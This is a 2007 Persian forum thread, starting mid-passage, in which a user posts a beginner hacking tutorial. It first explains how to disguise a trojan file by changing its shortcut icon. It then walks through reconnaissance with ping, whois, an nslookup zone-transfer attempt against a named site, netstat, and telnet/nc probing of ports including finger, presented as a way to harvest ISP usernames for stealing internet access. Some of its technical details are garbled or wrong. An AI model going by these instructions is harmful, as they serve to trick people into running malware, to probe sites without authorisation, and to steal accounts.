بر روی فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه create shortcut را بر گزینید . حالا یه فایل از همون تروجان با اسم shortcut درست شده است حالا بر روی shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید در بالای آن گزینه shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید
mazi_z_PSP
12-05-2007, 20:01
انواع هکرها:
1- گروه نفوذگران کلاه سفید: (white hat hackers) : هر کسی که با دانش خود بتواند از سد موانع امنیتی یک شبک بگذرد و به داخل شبکه راه پیدا کند اما اقدام خرابکارانه ای انجام ندهد را یک هکر کلاه سفید می خوانند. خب حتما می گویید عجب ترجمه سختی ما که هیچ نفهمیدیم. عجله نکنید. اینم مثال راحتش. تصور کنید دانشجویی که در یک دانشگاه درس می خونه و می دونه تمامی لیست حضور و غیاب و نمرات دانشجوها در کامپیوتری در اتاق شبکه دانشگاه قرار داره. حالا این دانشجوی کنجکاو ما برای اینکه سر و گوشی آب داده باشه مدتها روی شبکه دانشگاه کار می کنه و از راه های مختلف( که خارج از بحث و حوصله این مقاله است و اگر بخوام راستش رو بگم میشه 100 ها کتاب راجعش نوشت) وارد اون شبکه میشه. یعنی به طور معمول هیچ دانشجویی حق نداره بتونه نمراتش رو ببینه ولی این پسر ناقلای ما یه جورایی وارد شبکه میشه و نمراتش رو می بینه و همچنین حضور و غیابش رو. خب این پسر ناقلا یک هکره. چون این پسر ناقلا فقط نمرات رو می بینه و دست کاری نمی کنه(لابد وجدانش اجازه نمی ده) یک هکر کلاه سفید میشه.
به عنوان مثالی دیگر هکرهای کلاه سفید متخصصین شبکه ای هستند که سوراخهای امنیتی شبکه را پیدا می کنند و به مسوولان گزارش می دهند. مثلا این دانشجوی ناقلا می تونه بره به مسوول شبکه بگه که چطوری وارد سیستمش شده( چون حتما یه ضعفی داشته دیگه) بعدش اونا هم بهش قاقالیلی میدن!
2-گروه نفوذگران کلاه سیاه (Black hat hackers) : به این گروه کراکر –Cracker- می گویند. این افراد آدمهایی هستند که با دانشی که دارند وارد کامپیوتر قربانی خود شده و به دستکاری اطلاعات و یا جاسوسی کردن و یا پخش کردن ویروس و غیرو می پردازند( در انتهای همین مقاله انواع راه های نفوذگری بحث شده). مثلا همون دانشجوی ناقلای مثال بالا اگر بره داخل شبکه و نمراتش رو عوض کنه و به خودش همش بیست بده و یا ایمیل دختر رییس دانشگاه رو از اون تو کش بره و نامه نگاری عاشقانه راه بندازه و یا اصلا روی تمام سیستمهای دانشگاه ویروس بندازه دیگه میشه یک کراکر. پس آقایون و خانومها دانش یک شخص می تونه در جهت مثبت به کار بره یا منفی. لب کلام اینکه اگر اون شخص آدم خوبی بود و تو شبکه دست کاری نکرد بهش میگن کلاه سفید اگر شرور بود و عشق خرابکاری بهش می گن کلاه سیاه. مثل یه آدمی تصور کنید که کشتی گیره. اگر هوای ضعیف ضعفا رو داشته باشه بهش میگن پهلوون اما اگر قلدر بازی واسه همه در بیاره مردم بهش می گن لات و چماق کش!
3-گروه نفوذگران کلاه خاکستری (gray hat hackers) : خب شاید سخت ترین کار توصیف حوزه این گروه از نفوذگرهاست. به این نفوذگرها بعضا whacker هم می گویند( البته زیاد مصطلح نیست فقط برای اطلاع بدانید). این گروه از نفوذگرها بنا به تعریفی حد وسط دو تعریف گذشته هستن. یعنی گاهی شیطنت می کنن و توی سیستم خرابکاری می کنن و گاهی خرابکاری نمی کنن! یعنی اینکه هم کلاه سفیدن هم کلاه سیاه واسه همین رنگشون رو قاطی کردن شده خاکستری! بنا به تعریف دیگه کلاه خاکستری ها شیطونی هاشون هم عامه پسنده یعنی اگر بخوان خرابکاری کنن در جهت اطلاع عموم انجام میدن و به قول معروف فی سبیل الله و برای مردم. مثلا اون دانشجوئه مثال بالا اگه بیاد یه نسخه از لیست حضور و غیاب رو به ایمیل تمام دانشجویان دیگه بزنه و بگه برید حالا حالش رو ببرید و ببینید هرکی چقدر غیبت داره و نمره تحقیقش چند شده.
4- گروه نفوذگران کلاه صورتی ( pink hat hackers): خب این دسته بندی به ندرت دیده شده و اکثر مواقع کلاه صورتی ها رو جزیی از کلاه سیاه ها می دونند. به زبان شیرین فارسی اینها همون جوجه هکرها هستند! این افراد آدمهای کم سوادی هستند که فقط با چند نرم افزار به خرابکاری و آزار و اذیت بقیه اقدام می کنن. مثلا شماها رو توی مسنحر یاهو بوت می کنن و یا توی چت رومها خرابکاری می کنن و یا با نرم افزارهای آماده ایی مثل ساب سون و غیرو اقدام به هک کردن بقیه می کنن و از این قبیل. بنابراین به کلاه صورتی ها می گیم جوجه هکر!
انواع حمله هکرها:
- استراق سمع (interception) : در این روش نفوذگر موفق شده که در حین تبادل اطلاعات گوش کند. وی مخفیانه این اطلاعات را مورد نظر داشته و اطلاعات مورد نیاز را برای خودش نسخه برداری می کند. تکنیک ها و روش های بسیاری را هکرها در استراق سمع به کار می برند که یکی از آنها همان sniff بود که در مقاله چند روز قبل کوتاه به آن اشاره کردم. بگذارید مثالی بزنم تا 2 زاریتان کاملا بیفتد. شما در حال مخ زدن در روی اینترنت هستید و شبهای متمادی وقت گذاشتید مخ این دختره رو بزنید و شمارش رو بگیرید. در حال چت کردن هستید که بالاخره عروس خانوم شماره رو به شما میده و شما خوشحال که فردا حتما بهش زنگ می زنید. اما شمای بدبخت نمی دونید که یه هکری ناقلایی کامپیوتر شما رو زیر نظر داره و کلیه چت های شما و اون خانوم رو داره می بینه. اون هکره داره استراق سمع می کنه. حرفاتون براش دلچسب نیست ولی به محض دیدن اون شماره تلفن براش جالب توجه میشه! اینکه شماره تلفن رو یادداشت می کنه و فردا زنگ می زنه به دختره و همون صبحش قرار می گذاره و عشق و حالی که نگو. سر بدبخت شما هم کلاه میره. این جوریاس دیگه. باید زندگی کرد!!!
- دستکاری اطلاعات (modification ): نفوذگر عزیزمون موفق به تغییر اطلاعات میشه. در اینجا بدون اطلاع از قربانی بدبخت, هکر ما اطلاعات رو تغییر میده. مثلا یکی بیاد و بره داخل لیست نمرات یک دانشگاه و نمراتش رو همچین یک حال اساسی بهشون بده و معدلش از 13 بشه 18!
- افزودن اطلاعات و جعل ( fabrication ): در این روش نفوذگر اطلاعات رو به سرقت نمی بره و یا جایگرین نمی کنه بلکه به اطلاعات فقط اطلاعات دیگری رو اضافه می کنه. مثلا فرض کنید مدیر شرکتی نامه ای می زنه به مسوول خرید و لیست خریدی برای شرکت میده. حال شما که هکر بسیار زرنگی هستید این نامه رو جعل کرده و یه سری چیزها بهش اضافه می کنید مثلا می نویسید که خرید یک میز جدید برای آقایی که خودتون باشید! و بعد نامه رو می فرستید برای مامور خرید. مامور خرید بی نوا هم میره لیست رو تهیه می کنه. به واقع شما در اینجا اطلاعات حاوی اون نامه رو همون طور که هست می گذارید باشه ولی بهش مطالب جدید هم اضافه می کنید. هرچند می شه این اقدام رو در زیر شاخه modification آورد اما میگم شما زیاد درگیر گروه بندی نشید بلکه مفهوم رو متوجه بشید که به واقع هدف اصلی این مقاله همینه.
- حمله از نوع وقفه ( interruption): در این نوع حمله هکر باعث اختلال در شبکه و تبادل اطلاعات میشه. تکنیک های بسیاری وجود داره برای هکرها اما 2 مثال بسیار مشهود که نتیجه اش برای یک وبگرد به وضوح مشخصه و در نتیجه همین حملات صورت می گیره یکی در چت رومهاست که گاهی می بیند کسی کامپیوتر سرور چت رو وقفه می ندازه و دیگر شما قادر به چت در آن چت روم نیستید و یا اینکه حتما شنیده اید وقتی هکری به یک سایت حمله کرده و باعث کندی آن سرور شده و این باعث می شود که اگر سایت در عرض 5 ثانیه می بایست در مرورگر شما ظاهر شود یا اصلا قابل بارگزاری نیست (سایت به قول معروف لود نمی شود) و یا اینکه بعد از مثلا 1 دقیقه ظاهر می شود. اینگونه حملات بلای جان کسانی است که مسوول یک سایت و یا شبکه هستند چرا که کندی شبکه همانا و سر و صدای مدیر در آمدن همانا.
mazi_z_PSP
12-05-2007, 20:06
سلام اینم اموزش کامل انواع هک که شامل اموزش هک کردن سایت و وبلاگ هم میشه و به یه سری سوالات کلیدی شما هم جواب داده شده معمولا سوالهای شما در اولش ايناست ۱-هک چيه آيا وارد شدن به يه کامپيوتر هک محسوب ميسه؟ ۲-وقتی يه کامپيوتر خاموشه ميشه هکش کرد؟ ۳-آيا برای اينکه يک هکر شويم بايد خودمان يه بار هک شده باشيم؟ البته سوال که زياده ولی معمولا همه ی شماها همين ها رو میپورسين. حتما تو اين چند روزه در باره ی اين ويروس جديده خبرهايی شنيده ايد.يکيش وب لاگ خودم.که بعد از اون ماجرا ماکروسافت گفت patchمخصوص ويندوز ها ی گوناگون رو نصب کنيد.خوب اين يعنی چي؟يعنی اين که سيستم عامل ها را انسان ها درست ميکنن بنابراين خطای آن ميشه گفت ۵۰تا۵۰ است در نتيجه به اين خطاها bugگفته ميشود که هر شرکت تا اين سوتی ها رو ديده سريعا اين patchرو برای ماسمالی کردن و در امن ماندن از دست هکرها پخش ميکنه.خوب ببينيد بعضی از هکرها اصلا اين وظيفه را دارند که ضعف اين شرکتو نشان بدم البته ما نوع های مختلفی داريم که در حوصله اين مقاله نميگنجد . به چه چيزهايی برای شروع نياز داريم: ۱-ابتدا زبان Cرا فرابگيريد. برای چي؟برای صحبت با پورتهای مختلف ۲-Dosرا خوب بلد باشيد.برای چي؟برای استفاده از FTP SERVER ۳-دو سيستم عامل داشته باشيد .يکی از خانواده ی ويندوز و ديگری از خانواده ی Unix IP:مهمترين چيز و راحترين چيز در هکه که خيلی راحت به دست مياد و اهميت فوق العاده ای برای Telnetکردن به سايتهای مختلف و دودر کردن اينترنت و.... Whois:تعريف خاصی ندارد اما ميشه گفت اطلاعات هر سايت را به ما ميده Telnet:برای صحبت با ورتها و وارد شدن بهFTPالبته اين تعريف درست و کامل نيست. Port:در زبان فارسی به معنای بندر است خوب حالا کامپيوتر Serverرا جزيره در نظر بگيريد وکه چندين بندر دارد و هرکدام از اين بندرها کاره خاصی ميکنند. بدست آوردن IPخودمان بعد از اتصال به نت: 1-رفتن به CMDويندوز XPويا DOS۹۸وتايپ کردن اين عبارتnetstat -n 2-Clickراست کردن بر روی اون دوپنجره پايين Desktopهمان دو پنجره ای که وقتی به نت وصل هستيم چشمک ميزنه و بعد انتخاب گزينهSatusو زدن Deatilدر بالای پنجره و ديدن IPخودمان در پايين صفحه و IP SERVERدر بالای آن طبقه بندی IP ها: IPها به ۵ کلاسAتاEتقسيم ميشوندکه بر حسب اهميت کلاسAتاCمورد اهميت تر است و ما هر ۵ نوع را برای شما بيان ميکنيم ۱-قالب ۳۲ بيتی کلاس Aاين گونه است۷بيت شبکه و ۲۴ بيت کاربر.اگر IPرا اينگونه فرض کنيمxxx.yyy.zzz.rrrاين کلاس شامل تمام IPهايی ميشود که xxxهای آن بين1تا۱۲۶است.هر گاه پرارزشترين بيت IP آدرس صفر باشد , آدرس از كلاس A است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 127 شبكه ميباشد و ميتواند حدود 17000000 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس A شبكه هاي ستون فقرات اينترنتي هستند . ۲-قالب 32 بيتي كلاس B بصورت زير است : آدرس كاربر(16 بيت) آدرس شبكه(14بيت) 10 هر گاه پرارزشترين بيتهاي IP آدرس10 باشند , آدرس از كلاس B است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 16382 شبكه ميباشد . كه هر يك ميتواند 65534 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس B شبكه هاي عظيم اينترنتي هستند كه تمام اين آدرسها امروز تخصيص داده شده اند .اينIPها تمام xxxهايی را شامل ميشوند که عددشان بين128تا۱۹۱است و از کلاسهای پر کاربرد هستند. ۳-قالب 32 بيتي كلاس C بصورت زير است : آدرس كاربر(8 بيت) آدرس شبكه(21بيت) 110 در اين كلاس پرارزشترين بيتها 110 هستند . اين كلاس پر كاربردترين كلاس است . در اين كلاس با توجه به آدرس 21 بيتي شبكه , ميتوان حدود 2000000 شبكه تعريف كرد.و اين کلاس تمام IPهايی را شامل ميشود که xxxهای آنها بين192تا۲۲۳است. ۴-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . ۵-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . خلاصه ای از مطالب بالا: اين هم خلاصه ی مطالب مهم که اگر حوصله خواندن اين کلاسهای IPمسخره را نداريد 1- كلاس A : عدد سمت چپ IP ادرسهاي كلاس A بين 0 تا 127 ميباشد . 2- كلاس B : عدد سمت چپ IP ادرسهاي كلاس B بين 128 تا 191 ميباشد . 3- كلاس C : عدد سمت چپ IP ادرسهاي كلاس C بين 192 تا 223 ميباشد . فعلا تا اینجا رو داشته باشید.
mazi_z_PSP
12-05-2007, 20:07
سلام خوب حالا فکر کنم مفهوم IPقشنگ براتون جاافتاده ميريم سر دستورها بدست آوردن IPيک سايت: در اولين قدم هک چه کلاينت و چه سرور بايد IPرو بدست بياوريم.که برای به دست آوردن IP يک سرور يا سايت ۲ روش وجود دارد البته نرم افزارهای زيادی در اين مورد هست که به موقعش معرفی ميکنم ۱-در CMDويندوزتان برويد و اين عبارتو تايپ کنيدping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]وبه/</A> جای domainآدرس اينترنتی سايت خودتونو بنويسيد مثلا در مورد سايت يك سايت قبلا امتحان کردم شده: ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> Pinging <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round trip times in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms بعد IPاين سايت [66.48.76.205]است.و يه سرس اطلا عات ديگه با همين دستوره کوچولو به دست اومد که بعدن سر موقعش همشو بهتون تو ضيح ميدم. روش دوم۲-همان Whoisکردن است که در اوايل صحبتهايم براتون تعريفش کردم اين راه به نظر شخصی من بهتر از PINGکردنه چون اطلاعات جامع تری رو ميده و يکی از همين سايتها که هر هکری بهش علاقه منده اينه برای ديدنش اينجارو کليک کنيد.و برای Whoisکردن اين عبارتو در اينترنت اکسپلولر تايپ ميکنيم و Enterميزنيم <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]که</A> به جای اين ضربدرها آدرس سايت مورد نظر خود را بنويسيد مثلا در مورد همون سايت اين ميشود <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> خيلی از شماها حتما فرق اين دو روش را فهميدين در روش Whoisاطلاعات ذيقيمتی رو بدست مياورين در اصل ميشه گفت اين روندها مثل زنجير بهم پيوستن خوب اطلاعاتی که گفتم همونDNS ServerياDomain Serverاست و به وسيله همين DNS Serverو با استفاده از دستور nslookupاطلاعات ذيقيمت تری رو بدست مياوريد. استفاده از دستور مهم nslookup وقتی DNS Serverيک سايتو بدست آورديم با استفاده از روش Whoisکردن که در بالا گفتم و اين آدرس هميشه در سطر آخر ديده ميشود و معمولا به اين شکل است در مورد همون سايت امتحان کردم شد s1.moaddabfurniture.com s2.moaddabfurniture.com خوب حالا شروع ميکنيم اين دستورو در CMDتايپ nslookup وEnterکنيد نتيجه به اين شکل است: *** Can't find server name for address 192.168.20.3: Non-exi... *** Can't find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: xxx.xxx.xx.x خوب حالا اين عبارتو تايپ ميکنيم server dns_serverو به جای dns_serverهمون DNS Serverاوليه را تايپ ميکنيم مثلا در مورد همون سايت ميشه server s1.moaddabfurniture.comاگه احيانا به پيام اخطار برخورد کرديد DNS Serverدوم را وارد کنيد فکر کنم متوجه شديد جريان از چه قراره اينبار شما وارد محيط nslookupشديد پس اينجا هم از دستور ها ی متفاوتی پيروی ميکنه که هرکدو اطلاعات خاص خودش ميده که الان من اين دستورها رو ميگم ولی شما از بعضی نتايجش ميتونين اطلاعات ذيقيميتی رو بدست آوريد. set type=any بعدش اينو تايپ کنيدls -d site_name و به جای siteاسم سايتتونو بنويسيد مثلا ls -d moaddabfurniture.com خوب اگه شماها تا حالا رو يه سايت کارای بالا رو کرده باشين دستتون پره به زبان عاميانه يعنی شما دارين خودتونو شارژ ميکنين برای حمله به سايت قربانی اگه موافق باشيد در بار بعد بريم سر بحث پورتها پس فعلا با اجازه
mazi_z_PSP
12-05-2007, 20:09
سلام مفهوم پورتها به طور کامل و مشخصات آن خوب اين بحث مهمترين کارمونه چون ميخوام پو رتها رو بشناسيم و به اونها تلنت کنيم چون تا وقتی که نفهميم کدوم پورت چه کاری انجام ميده نميتونيم موفق بشيم ۱- پورتهای 0 تا 1023 : مشهورترين پورتها هستند و معمولا هرکدام برای يک سرويس خاص استفاده میشود. با تعدادی از اين پورتها در قسمت های قبل آشنا شدهايد. ۲- پورتهای 1024 تا 49151 : اين سری از پورتها مشخصا با هيچيک از سرويسهای اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرمافزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرمافزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار میکنيد، يکی از اين پورتها به صورت random باز شده و يک ارتباط با سرور (با توجه بهنوع سرويس اينترنتی که میدهد که يکی از پورتهای 0 تا 1023 است) برقرار شده و دادهها ارسال و دريافت میشوند. يعنی پورت شما يکی از پورتهای اين قسمت است و پورت سرور يکی از پورتهای بالايی.اين سری پورتها را پورتهای register شده هم میگويند. ۳- پورتهای 49152 تا 65535 : اين سری از پورتها بهندرت استفاده میشوند. کاربرد اساسی آنها برای يک سری سرويسهای خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) به کار میرود. البته خيلی از trojanهای معروف از پورتهای رديف ۲ هم استفاده میکنند و اين تقسيمبندیها هميشه برقرار نيست و بههمين علت است که گاهی پورتها را به دودسته زير 1024 و بالای 1024 تقسيم میکنند. فکر کنم الان مفهوم پورت براتون جا افتاد و اما يه مطلب مهم: شما بايد با مدل TCP/IPآشنا باشيد اگه نيسيتيد ياد بگيريد اينم از مقدمات يه هکر شدنه در ضمن من ميخوام آموزشش بدم ميتونين نه کتاب بخرين نه پول آموزشگاه بدين پس آروم آروم من هم به سايت رونق ميدم اما من گفتم و بازم ميگم تايپ فارسی خوب نيست اگه يه شريک مشتی گير مياوردم مطالب بالا رو با هم کامل و دو نفری مشغول باشيم هم شماها بيشتر حال ميکردين هم ما به خدا به هرحال بايد با تنهايی ساخت ولی حتما اين TCP/IPرو ميگم اما گفتم زبان Cرو بريد بيرون ياد بگيريد من نميتونم اينطوری تو وبو بنويسم. پورتهای باز وبسته ی يک سرور را چگونه تشخيص دهيم معمولا اين کارها را نرم افزارها ميکنند نه خود کاربر يه توضيح کوچولو در مورد Whois اگر شما ميخواین Whois کنيد و از همان سايت samspadeاستفاده کنيد شايد جواب نده علتش رو بعدن ميگم اما برای اينکه یه کم بدونين به دليد مسایل دامين و جغرافيايی است پس از اين دستور استفاده کنيد مثلا آخر سايت شما .comداره اونوقت منظورمو ميگيرين اينم دستورش که در اينترنت اکسپلولر تو ضيح دادم . <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> و به جای ضربدر ها آدرس سايتو مينويسيد اينم مخصوص سايتهايی که آخرشون .irداره/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] اينم مخصوص اونايی که آخرشون .twو.bizو.cc <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> و ميخوام در مورد سايت رشد ببينيم خوب اين آدرسشهRoshd.irو به جای xxxxxxهامنويسيم Roshdو به جایyyyyمينويسيم .irفکرکنم الان خوب متوجه شده باشيد. چند نکته مهم در مورد PINGو دستوراتش اگه يادتون باشه اون اولای مقاله به یه سایت Pingکرديم خوب حالا ميخوام اون نتايجی رو که گفتم بعدن بهتون ميگم رو الان بگم چون الان مفهموم هک و خيلی چيزارو يادگرفتين بريم تو کارش چشم دستورشم يه بار ميگم که مجبور نشی دو ساعت بری بالا بگردی دنبالش Ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> domain or your ip اينم نتيجش ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> Pinging <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round trip times in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms خوب اين داره ميگه که زمان رسدن به پکت رو ميگه خودتون ببينيد که به سرعت شما و ترافيک و خطوط شبکه بستگی داره البته من بعضی جاهاش حذف کردم اما عبارت جلوی Replyتايم رسيدن را نشان ميده و يه نکته مهم ديگه اينکه با توجه به سطر آخر ميفهميم lover-hackers.comفعال هست يا نه الان تو مثال بالا فعال است اما اگه عددهای جلوی عبارتهایMinimumوMaximumوAvreageصفر شود اونوقت يعنی فعال نيست. موفق باشيد
سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ip adress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnet alborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید
mazi_z_PSP
12-05-2007, 20:11
اگر فونت این مطالب براتون کوچيک هستش و نميتونين به راحتی بخونين ميتونين تو Word کپی کنين و فونت رو طبق نظر خودتون درست کنين
Payman_62
13-05-2007, 00:57
سلام.
مطالبت خیلی قدیمیه. ولی خوب برای مقدمه خوبه. امیدوارم در جا نزنی و مطالبت به روز باشه.
سعی کن مطالب ارسالی ارتباط با برنامه نویسی ویبی داشته باشه. صرفا آموزش هک در این انجمن جایی نداره.
COMING-UP-NEXT
13-05-2007, 01:34
حالا 1 سوال ؟
هکر کیست و چیست و اینا بماند ...
اما اکثر اکسپلویت ها به زبان های Perl و C هستن چرا VB ؟
در ضمن اینا به vb ربطی نداشت که ؟
چرا همه فکر می کنن که برای هکر شدن نیاز دارن که از vb شروع کنن ؟
mazi_z_PSP
14-05-2007, 13:46
سلام.
مطالبت خیلی قدیمیه. ولی خوب برای مقدمه خوبه. امیدوارم در جا نزنی و مطالبت به روز باشه.
سعی کن مطالب ارسالی ارتباط با برنامه نویسی ویبی داشته باشه. صرفا آموزش هک در این انجمن جایی نداره.
ممکنه مطالب قديمی باشه اما برايه کسايی که ميخوان از اول يا از وسط شروع کنن الزامی هستش
mazi_z_PSP
14-05-2007, 13:48
حالا 1 سوال ؟
هکر کیست و چیست و اینا بماند ...
اما اکثر اکسپلویت ها به زبان های Perl و C هستن چرا VB ؟
در ضمن اینا به vb ربطی نداشت که ؟
چرا همه فکر می کنن که برای هکر شدن نیاز دارن که از vb شروع کنن ؟
